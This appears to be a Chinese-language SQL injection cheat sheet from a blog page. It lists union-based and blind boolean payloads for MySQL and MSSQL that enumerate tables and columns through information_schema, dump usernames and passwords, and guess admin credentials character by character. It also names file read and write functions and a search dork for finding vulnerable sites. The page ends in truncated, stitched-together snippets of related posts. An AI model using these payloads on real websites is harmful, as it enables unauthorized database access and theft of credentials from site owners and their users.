mysql篇
1.內建函式和變數
@@datadir,version(),database(),user(),load_file(),outfile()例項:
***.php?id=1 and 1=2 union select 1,
group_concat(username,0x3a,password),3 from user
查表段:
***.php?id=1 and 1=2 union select 1,2,table_name from
(select * from information_schema.tables where table_schema=資料庫名的hex
order by table_schema limit 0,1)t limit 1–
***.php?id=1 and 1=2 union select 1,2,column_name from
(select * from information_schema.columns where table_name=表名的hex
and table_schema=資料庫名hex值 order by 1 limit 1,1)t limit 1–
***.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20)
from (select * from information_schema.columns where table_name=表名的hex
and table_schema=資料庫名hex值 order by 1 limit 0,n)t limit 1–
[n表示第n條資料]
猜表名
*.asp?id=1 and exists (select * from admin)*.asp?id=1 and exists (select password from admin)*.asp?id=1 order by 3*.asp?id=1 union select 1,password,3 from admin先判斷內容的長度
*.asp?id=132 and (select top 1 len(user) from admin) >5*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97確定了之後繼續從第二個位置猜
*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin)>97mssql篇
基於報錯的mssql注入:
判斷是否是mssql
'and exists (select * from sysobjects) --猜表名:
'and exists(select * from admin)--SQL手工注入
site xx.cn inurl asp?id 找文章 xx.cn pth onews.asp?id 243 試注入 xx.cn pth onews.asp?id 243 order by 10 xx.cn pth onews.asp?id 243 order by 20 order by 語句用於...
sql注入 手工注入
表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...
sql手工注入原理
純粹一些個人練習心得,所以今天就寫一篇部落格記錄一下 數值型 1.url輸入 and 1 1 and 1 2 回顯頁面不同 整形判斷 如果頁面執行錯誤,則說明此 sql 注入為數字型注入。因為當我們輸入 and 1 1時,後台執行 sql 語句 如 select from 表名 where id x...